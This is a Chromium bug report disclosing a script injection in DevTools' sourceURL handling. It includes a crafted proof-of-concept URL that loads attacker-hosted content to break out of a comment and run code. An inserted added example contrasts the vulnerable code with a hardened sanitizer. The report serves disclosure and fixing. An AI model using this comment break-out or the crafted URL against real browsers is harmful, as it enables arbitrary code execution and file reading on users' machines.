Security: Devtools Potential Arbitrary Script Injection
Reported by
gregory....@gmail.com,
Jun 20 2016
Issue description
VULNERABILITY DETAILS
There is a *potential* arbitrary privilege script injection point in DevTools' inspector.js when it fetches the remote script code (as part of the remoteBase param) and appends the script's URL as sourceURL at the end of the script's code.
This can be exploited only under rare special circumstances.
Vulnerable Function:
function evaluateScript(sourceURL, scriptSource) {
    ..
    self.eval(scriptSource + "\n//# sourceURL=" + sourceURL); // <-- sourceURL needs to be sanitized
}
Under normal circumstances, when chrome-devtools://devtools/bundled/inspector.html?remoteFrontend=true&remoteBase=[URL in https://chrome-devtools-frontend.appspot.com/] is accessed, it fetches "https://chrome-devtools-frontend.appspot.com/.../screencast_module.js". This URL is appended as a comment to the source code of the remotely fetched screencast_module.js as "//# sourceURL=<URL>".
An attacker can control the full URI path (not the hostname) from where the remote "script" content is fetched by specifying the full URL as remoteBase followed by '?' to nullify the effect of DevTools appending screencast_module.js. Depending on the content that is fetched remotely, the newline sourceURL comment can be broken out of, if it's made to be part of a multi-line comment. So, this gives an opportunity for the attacker to inject arbitrary script code by forcefully terminating the multi-line comment, followed by malicious code.
VERSION
Chrome Version: 51.0.2704.103 m stable
Operating System: All
REPRODUCTION CASE
[ https://grpdmp.tk is currently using a self-signed cert, so explicitly allow an exception by visiting the URL first, before trying the steps below ]
Copy paste the following URL to Omnibar:
chrome-devtools://devtools/bundled/inspector.html?remoteFrontend=true&remoteBase=https://chrome-devtools-frontend.appspot.com/../grpdmp.tk/gchrome1/benign.txt?*/alert(document.domain);screencast_module={};screencast_module.js=0;dummy1=
( you should observe an alert that says "devtools" ).
For a PoC that dumps out the C-Drive contents (in Windows), please copy paste the URI in the attached file (Devtools-Crafted-URI3.txt) into Omnibar.
I've made use of a benign text file that contains "/*" @ https://grpdmp.tk/gchrome1/benign.txt to demonstrate this possibility.
Also, I made use of Issue 619414 in this PoC, since I couldn't locate a sample file on the https://chrome-devtools-frontend.appspot.com/ domain that satisfies this criteria.
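As an added example that is not part of the report and not Chromium's own code, the following shows the evaluateScript pattern from the report in its unsafe form next to a hardened form, run on constructed input (a remote file consisting of "/*" and a sourceURL carrying a comment terminator followed by a harmless marker assignment in place of the report's payload). ALLOWED_ORIGIN, the helper names and the sample URLs are assumptions.

```javascript
// Added example, not Chromium's code. ALLOWED_ORIGIN, runScript and the
// helper names are assumptions made for this demonstration.
const ALLOWED_ORIGIN = "https://chrome-devtools-frontend.appspot.com";

// Unsafe: mirrors the report. A scriptSource that opens a block comment ("/*")
// swallows the "\n//# sourceURL=" line, and a "*/" inside sourceURL closes
// that comment, so whatever follows in the URL is evaluated as code.
function buildUnsafe(sourceURL, scriptSource) {
  return scriptSource + "\n//# sourceURL=" + sourceURL;
}

// Hardened: only two things can escape a "//" line comment here, a line
// terminator (ends the line comment) and "*/" (closes a block comment the
// script may have left open). The origin is checked as well, but URL parsing
// normalises "/../" away, so an origin check alone would still accept a
// traversal-style URL like the one in the report; neutralising "*" is what
// actually removes the break-out.
function sanitizeSourceURL(sourceURL) {
  const parsed = new URL(sourceURL); // throws on malformed input
  if (parsed.origin !== ALLOWED_ORIGIN) {
    throw new Error("sourceURL origin not allowed: " + parsed.origin);
  }
  const href = parsed.href;
  // The WHATWG parser strips \t \n \r and percent-encodes U+2028/U+2029,
  // but check explicitly rather than rely on that behaviour.
  if (/[\r\n\u2028\u2029]/.test(href)) {
    throw new Error("sourceURL contains a line terminator");
  }
  // "*" is legal in a URL path or query; percent-encode it so "*/" cannot occur.
  return href.replace(/\*/g, "%2A");
}

function buildHardened(sourceURL, scriptSource) {
  return scriptSource + "\n//# sourceURL=" + sanitizeSourceURL(sourceURL);
}

// Evaluate in a fresh function scope and report whether it parsed and ran.
function runScript(source) {
  try {
    new Function(source)();
    return { ran: true, error: null };
  } catch (e) {
    return { ran: false, error: e.constructor.name };
  }
}

// Constructed inputs (not the report's real PoC URL).
const BENIGN_REMOTE_FILE = "/*";
const CRAFTED_SOURCE_URL =
  ALLOWED_ORIGIN + "/../example.invalid/benign.txt?*/globalThis.injected=true;//";
const NORMAL_SOURCE_URL = ALLOWED_ORIGIN + "/x/screencast_module.js";
const NORMAL_MODULE = "globalThis.loaded = true;";

function demonstrate() {
  globalThis.injected = false;
  globalThis.loaded = false;
  const unsafe = runScript(buildUnsafe(CRAFTED_SOURCE_URL, BENIGN_REMOTE_FILE));
  const injectedByUnsafe = globalThis.injected; // true: the comment break-out ran
  globalThis.injected = false;
  const hardened = runScript(buildHardened(CRAFTED_SOURCE_URL, BENIGN_REMOTE_FILE));
  const injectedByHardened = globalThis.injected; // false: unterminated comment, SyntaxError
  const normal = runScript(buildHardened(NORMAL_SOURCE_URL, NORMAL_MODULE));
  return { unsafe, injectedByUnsafe, hardened, injectedByHardened, normal, loaded: globalThis.loaded };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demonstrate());
}
```

With the hardened builder the crafted input no longer executes anything: the block comment opened by the remote file is never closed, so the whole string fails to parse, while a normal module with a normal sourceURL still runs and keeps its sourceURL comment intact.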
Jun 21 2016
I believe fix for Issue 619414 should address this one.
Oct 6 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by est...@chromium.org, Jun 21 2016
Labels: Security_Severity-Medium Security_Impact-Stable
Owner: dgozman@chromium.org
Status: Assigned (was: Unconfirmed)